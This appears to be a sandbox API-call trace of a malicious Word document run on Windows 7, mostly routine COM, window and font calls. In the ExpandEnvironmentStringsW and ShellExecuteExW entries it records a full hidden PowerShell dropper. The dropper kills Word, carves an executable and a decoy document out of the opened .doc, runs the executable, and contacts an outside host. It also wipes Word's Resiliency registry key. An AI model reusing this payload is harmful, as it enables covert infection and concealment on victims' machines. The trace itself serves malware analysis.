[0068.088] ITypeLib:GetTypeInfoOfGuid (in: This=0x304f10, GUID=0x7fee52b2c30*(Data1=0x41904400, Data2=0xbe18, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x8b, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x20e9f8 | out: ppTInfo=0x20e9f8*=0x305608) returned 0x0
[0068.089] ITypeInfo:GetRefTypeOfImplType (in: This=0x305608, index=0xffffffff, pRefType=0x20e9e8 | out: pRefType=0x20e9e8*=0xfffffffe) returned 0x0
[0068.089] ITypeInfo:GetRefTypeInfo (in: This=0x305608, hreftype=0xfffffffe, ppTInfo=0x7fee52bc128 | out: ppTInfo=0x7fee52bc128*=0x305660) returned 0x0
[0068.089] IUnknown:Release (This=0x305608) returned 0x1
[0068.089] IUnknown:Release (This=0x304f10) returned 0x1
[0068.089] IUnknown:AddRef (This=0x305660) returned 0x2
[0068.089] ITypeInfo:LocalGetIDsOfNames (This=0x305660) returned 0x0
[0068.089] IUnknown:Release (This=0x305660) returned 0x1
[0068.089] IUnknown:AddRef (This=0x305660) returned 0x2
[0068.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0068.089] ITypeInfo:LocalInvoke (This=0x305660) returned 0x0
[0068.089] ExpandEnvironmentStringsW (in: lpSrc="%sYStemROOt%", lpDst=0x20d380, nSize=0x400 | out: lpDst="C:\\Windows") returned 0xb
[0068.089] IUnknown:Release (This=0x305660) returned 0x1
[0068.089] GetCurrentThreadId () returned 0x628
[0068.089] _wcsicmp (_String1="window", _String2="window") returned 0
[0068.089] GetCurrentThreadId () returned 0x628
[0068.089] GetCurrentThreadId () returned 0x628
[0068.089] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.089] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.089] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.089] IsCharSpaceW (wch=0x77) returned 0
[0068.089] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.089] IsCharSpaceW (wch=0x77) returned 0
[0068.091] IUnknown:AddRef (This=0x305660) returned 0x2
[0068.091] ITypeInfo:LocalGetIDsOfNames (This=0x305660) returned 0x0
[0068.091] IUnknown:Release (This=0x305660) returned 0x1
[0068.091] IUnknown:AddRef (This=0x305660) returned 0x2
[0068.091] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0068.091] ITypeInfo:LocalInvoke (This=0x305660) returned 0x0
[0068.091] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", lpDst=0x20d2f0, nSize=0x400 | out: lpDst="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -i") returned 0x496
[0068.091] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", lpDst=0x332818, nSize=0x496 | out: lpDst="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}") returned 0x496
[0068.091] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x7fefe850000
[0068.091] GetProcAddress (hModule=0x7fefe850000, lpProcName="ShellExecuteExW") returned 0x7fefe877c70
[0068.091] ShellExecuteExW (in: pExecInfo=0x20daa0*(cbSize=0x70, fMask=0x440, hwnd=0x0, lpVerb="Open", lpFile="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe", lpParameters="-WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x20daa0*(cbSize=0x70, fMask=0x440, hwnd=0x0, lpVerb="Open", lpFile="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe", lpParameters="-WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x49c)) returned 1
[0068.137] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0068.137] SetTimer (hWnd=0x1021e, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008
[0068.137] GetCurrentThreadId () returned 0x628
[0068.176] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x20db20*=0x49c, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0068.221] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 1
[0068.221] TranslateMessage (lpMsg=0x20dae0) returned 0
[0068.221] DispatchMessageA (lpMsg=0x20dae0) returned 0x0
[0068.222] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 0
[0068.222] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x20db20*=0x49c, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0068.237] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 1
[0068.237] TranslateMessage (lpMsg=0x20dae0) returned 0
[0068.237] DispatchMessageA (lpMsg=0x20dae0) returned 0x0
[0068.237] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0068.237] KillTimer (hWnd=0x1021e, uIDEvent=0x1008) returned 1
[0068.237] GetCurrentThreadId () returned 0x628
[0068.237] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 0
[0068.237] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x20db20*=0x49c, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0075.218] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 0
[0075.241] GetParent (hWnd=0x1021e) returned 0x1021a
[0075.241] GetParent (hWnd=0x1021a) returned 0x10216
[0075.241] GetParent (hWnd=0x10216) returned 0x0
[0075.241] PostMessageW (hWnd=0x1021e, Msg=0x491, wParam=0x0, lParam=0x0) returned 1
[0075.241] GetMessageTime () returned 132304
[0075.241] GetMessagePos () returned 0x1a602d4
[0075.241] GetCursorPos (in: lpPoint=0x20d210 | out: lpPoint=0x20d210*(x=687, y=514)) returned 1
[0075.241] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x20d210 | out: lpPoint=0x20d210) returned 1
[0075.241] GetKeyState (nVirtKey=16) returned 0
[0075.241] GetKeyState (nVirtKey=17) returned 0
[0075.241] GetKeyState (nVirtKey=18) returned 0
[0075.241] GetKeyState (nVirtKey=160) returned 0
[0075.241] GetKeyState (nVirtKey=162) returned 0
[0075.241] GetKeyState (nVirtKey=164) returned 0
[0075.241] GetCursorPos (in: lpPoint=0x20d210 | out: lpPoint=0x20d210*(x=687, y=514)) returned 1
[0075.242] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x20d210 | out: lpPoint=0x20d210) returned 1
[0075.242] GetKeyState (nVirtKey=16) returned 0
[0075.242] GetKeyState (nVirtKey=17) returned 0
[0075.242] GetKeyState (nVirtKey=18) returned 0
[0075.242] GetKeyState (nVirtKey=160) returned 0
[0075.242] GetKeyState (nVirtKey=162) returned 0
[0075.242] GetKeyState (nVirtKey=164) returned 0
[0075.242] GetCapture () returned 0x0
[0075.242] GetCurrentThreadId () returned 0x628
[0075.242] GetCurrentThreadId () returned 0x628
[0075.242] GetCurrentThreadId () returned 0x628
[0075.242] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x20d5b0 | out: plResult=0x20d5b0) returned 0x1
[0075.242] NtdllDefWindowProc_W () returned 0x0
[0075.242] GetCurrentThreadId () returned 0x628
[0075.242] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0075.242] GetKeyState (nVirtKey=1) returned 1
[0075.242] GetKeyState (nVirtKey=2) returned 0
[0075.242] GetKeyState (nVirtKey=16) returned 0
[0075.242] GetKeyState (nVirtKey=17) returned 0
[0075.242] GetKeyState (nVirtKey=4) returned 0
[0075.242] GetKeyState (nVirtKey=18) returned 0
[0075.242] GetMessageTime () returned 132304
[0075.242] GetMessagePos () returned 0x1a602d4
[0075.242] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x20ce30 | out: plResult=0x20ce30) returned 0x0
[0075.242] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0075.242] GetKeyState (nVirtKey=1) returned 1
[0075.242] GetKeyState (nVirtKey=2) returned 0
[0075.242] GetKeyState (nVirtKey=16) returned 0
[0075.242] GetKeyState (nVirtKey=17) returned 0
[0075.242] GetKeyState (nVirtKey=4) returned 0
[0075.242] GetKeyState (nVirtKey=18) returned 0
[0075.242] GetMessageTime () returned 132304
[0075.242] GetMessagePos () returned 0x1a602d4
[0075.242] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x20c490 | out: plResult=0x20c490) returned 0x0
[0075.242] SetTimer (hWnd=0x1021e, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000
[0075.242] GetCurrentThreadId () returned 0x628
[0075.243] GetCurrentThreadId () returned 0x628
[0075.243] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x20db20*=0x49c, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0075.243] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 1
[0075.243] TranslateMessage (lpMsg=0x20dae0) returned 0
[0075.243] DispatchMessageA (lpMsg=0x20dae0) returned 0x0
[0075.243] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0075.243] GetAncestor (hwnd=0x1021e, gaFlags=0x2) returned 0x1021a
[0075.243] IsIconic (hWnd=0x1021a) returned 0
[0075.243] GetCurrentThreadId () returned 0x628
[0075.243] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 0
[0075.243] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x20db20*=0x49c, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0075.357] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 1
[0075.357] TranslateMessage (lpMsg=0x20dae0) returned 0
[0075.357] DispatchMessageA (lpMsg=0x20dae0) returned 0x0
[0075.357] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0075.357] KillTimer (hWnd=0x1021e, uIDEvent=0x1000) returned 1
[0075.357] GetCurrentThreadId () returned 0x628
[0075.357] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 0
[0075.357] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x20db20*=0x49c, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0075.545] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 1
[0075.545] TranslateMessage (lpMsg=0x20dae0) returned 0
[0075.545] DispatchMessageA (lpMsg=0x20dae0) returned 0x0
[0075.545] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 0
[0075.545] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x20db20*=0x49c, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0076.660] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 1
[0076.662] TranslateMessage (lpMsg=0x20dae0) returned 0
[0076.662] DispatchMessageA (lpMsg=0x20dae0) returned 0x0
[0076.662] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 1
[0076.662] TranslateMessage (lpMsg=0x20dae0) returned 0
[0076.662] DispatchMessageA (lpMsg=0x20dae0)
[0076.662] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 0
[0076.662] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x20db20*=0x49c, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0076.665] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 1
[0076.665] TranslateMessage (lpMsg=0x20dae0) returned 0
[0076.665] DispatchMessageA (lpMsg=0x20dae0) returned 0x0
[0076.665] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 1
[0076.665] TranslateMessage (lpMsg=0x20dae0) returned 0
[0076.665] DispatchMessageA (lpMsg=0x20dae0)
[0076.665] PeekMessageA (in: lpMsg=0x20dae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20dae0) returned 0
[0076.665] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x20db20*=0x49c, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
[0083.785] GetExitCodeProcess (in: hProcess=0x49c, lpExitCode=0x20db50 | out: lpExitCode=0x20db50*=0x0) returned 1
[0083.785] CloseHandle (hObject=0x49c) returned 1
[0083.785] IUnknown:Release (This=0x305660) returned 0x1
[0083.786] GetCurrentThreadId () returned 0x628
[0083.786] _wcsicmp (_String1="window", _String2="window") returned 0
[0083.786] GetCurrentThreadId () returned 0x628
[0083.786] GetCurrentThreadId () returned 0x628
[0083.786] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.786] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.786] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.786] GetCurrentThreadId () returned 0x628
[0083.786] _wcsicmp (_String1="window", _String2="window") returned 0
[0083.786] GetCurrentThreadId () returned 0x628
[0083.786] GetCurrentThreadId () returned 0x628
[0083.786] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.786] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.786] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.791] GetCurrentThreadId () returned 0x628
[0083.791] GetCurrentThreadId () returned 0x628
[0083.791] ISystemDebugEventFire:IsActive (This=0x2e8c60) returned 0x1
[0083.791] GetCurrentThreadId () returned 0x628
[0083.791] GetCurrentThreadId () returned 0x628
[0083.791] GetCurrentThreadId () returned 0x628
[0083.791] GetCurrentThreadId () returned 0x628
[0083.791] GetCurrentThreadId () returned 0x628
[0083.791] GetTickCount () returned 0x240d6
[0083.791] GetCurrentThreadId () returned 0x628
[0083.791] SetEvent (hEvent=0x350) returned 1
[0083.791] Sleep (dwMilliseconds=0x0)
[0083.812] GetTickCount () returned 0x240f5
[0083.812] GetCurrentThreadId () returned 0x628
[0083.812] GetSystemDefaultLCID () returned 0x409
[0083.812] GetVersionExW (in: lpVersionInformation=0x20f330*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x2304, dwBuildNumber=0x0, dwPlatformId=0x396ad50, szCSDVersion="") | out: lpVersionInformation=0x20f330*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0083.812] GetKeyboardLayoutList (in: nBuff=32, lpList=0x20f230 | out: lpList=0x20f230) returned 1
[0083.813] GetSystemMetrics (nIndex=4096) returned 0
[0083.813] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0ca
[0083.813] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0af
[0083.813] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b2
[0083.813] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c5
[0083.813] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c6
[0083.813] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c4
[0083.813] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc077
[0083.813] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0ce
[0084.388] RedrawWindow (hWnd=0x1021e, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1
[0084.388] GetTickCount () returned 0x24134
[0084.390] IUnknown:Release (This=0x27e180) returned 0x11
[0084.390] IUnknown:Release (This=0x294ce0) returned 0x3
[0084.390] IUnknown:Release (This=0x27e180) returned 0x10
[0084.390] IUnknown:Release (This=0x27e180) returned 0xf
[0084.390] IUnknown:Release (This=0x294ce0) returned 0x2
[0084.390] IUnknown:Release (This=0x27e180) returned 0xe
[0084.390] IUnknown:Release (This=0x27e180) returned 0xd
[0084.390] IUnknown:Release (This=0x27e180) returned 0xc
[0084.390] IUnknown:Release (This=0x27e180) returned 0xb
[0084.390] IUnknown:Release (This=0x2ba240) returned 0x1
[0084.390] IUnknown:Release (This=0x2ba240) returned 0x0
[0084.390] IUnknown:Release (This=0x27e180) returned 0x8
[0084.390] IUnknown:Release (This=0x27e180) returned 0x7
[0084.390] IUnknown:Release (This=0x27e180) returned 0x6
[0084.391] GetTickCount () returned 0x24134
[0084.391] GetCurrentThreadId () returned 0x628
[0084.391] GetCurrentThreadId () returned 0x628
[0084.391] GetCurrentThreadId () returned 0x628
[0084.411] LsGetRubyLsimethods () returned 0x0
[0084.411] LsGetTatenakayokoLsimethods () returned 0x0
[0084.411] LsGetHihLsimethods () returned 0x0
[0084.411] LsGetWarichuLsimethods () returned 0x0
[0084.411] LsGetReverseLsimethods () returned 0x0
[0084.411] LsCreateContext ()
[0084.413] EnumFontsW (hdc=0xd01091b, lpLogfont="Times New Roman", lpProc=0x7fee08ee8b0, lParam=0x20e030) returned 1
[0084.414] CreateFontIndirectW (lplf=0x20dfa0) returned 0x2d0a0967
[0084.414] SelectObject (hdc=0xd01091b, h=0x2d0a0967) returned 0x18a002e
[0084.414] GetTextMetricsW (in: hdc=0xd01091b, lptm=0x20de90 | out: lptm=0x20de90) returned 1
[0084.414] GetOutlineTextMetricsW (in: hdc=0xd01091b, cjCopy=0xe8, potm=0x20dd60 | out: potm=0x20dd60) returned 0xe8
[0084.415] SelectObject (hdc=0xd01091b, h=0x18a002e) returned 0x2d0a0967
[0084.415] SelectObject (hdc=0xd01091b, h=0x2d0a0967) returned 0x18a002e
[0084.415] GetTextFaceW (in: hdc=0xd01091b, c=32, lpName=0x20e0c0 | out: lpName="Times New Roman") returned 16
[0084.415] SelectObject (hdc=0xd01091b, h=0x18a002e) returned 0x2d0a0967
[0084.415] SelectObject (hdc=0xd01091b, h=0x2d0a0967) returned 0x18a002e
[0084.415] GetTextCharsetInfo (in: hdc=0xd01091b, lpSig=0x20dfe0, dwFlags=0x0 | out: lpSig=0x20dfe0) returned 0
[0084.415] SelectObject (hdc=0xd01091b, h=0x18a002e) returned 0x2d0a0967
